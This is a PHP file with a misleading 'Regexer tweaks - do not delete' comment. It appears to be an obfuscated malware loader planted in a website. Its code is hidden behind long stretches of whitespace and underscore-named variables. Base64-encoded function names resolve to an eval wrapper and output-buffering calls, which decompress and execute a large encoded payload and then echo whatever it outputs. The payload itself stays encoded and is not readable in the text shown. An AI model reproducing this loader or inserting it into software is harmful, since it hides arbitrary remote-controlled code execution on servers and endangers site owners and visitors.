<?php 
        $__='printf';$_='Loading Regexer tweaks - do not delete';
        



























































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmluPmkAUx99N+h142ITdtDUou26M4UGpItC6FV1mmBcjM4iW4ZLFC/jpi2i8xD5s06ZJzflNhslM8j9nOHMyD3AEYc/dpEARk7dFtJyJrXJ6QBEtz/cy701YbrxpkAqfBRYLUbwUmMe9pSeofJqm1WpVbFUO1oQPFWi30yq7dBD+IsrViohrzdRBtQXRuopYLp2y6V0cUlYRAAAAbhORhrbEsLHSNbvuoE1s9JoznAfP+0uzuDX31/UEQgUAAAAAAAAA/xvwOQMAAOB2Ed1p6jUeJ8yjMfPEFkQEAAAAAP6IyzoGXW37usZDXfXnJLJXjmwlbv1pRvA8obK1NVUWEEQ4De0Aywan2OZUHkbmKPC9TeyX+tIGqbnhQJqi5krXLE5COyfImhW6jCF7y1Q/cHBnY446z+qifdKV2t6Gqn6Ccpa7si0RrEd4JH0kdVsq/M/dsJd62Eoc+dvayNs7+3OmvcZGnQfuiCZf1U7I0NMPpvG1u2jHv/RR9g4doSxlqJYUNiViZ2NW7MmVDQl3ydyp9wKCB3SIbWn6JW4Q2Z7TcFj46QUu4isjD8xrm8e+/B5ma1LnK7OXdWi/Q8eoWcQu2+LuXj/FA4kWfl1Zb7yEJKHRoHi/INX7Vs7Qa/JyHs+zfvy91Tc40XgR152Orp1QklifRuY4vdrXbBRcxGA2jA+jooitSuXfJ5xSjveH2UPrd+Rn2vcI704O78XdU/x0dAv1OLdZj3N59vcXybY/+ofWTxKCClo=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































                                                                                                                                                                                                                     $________;
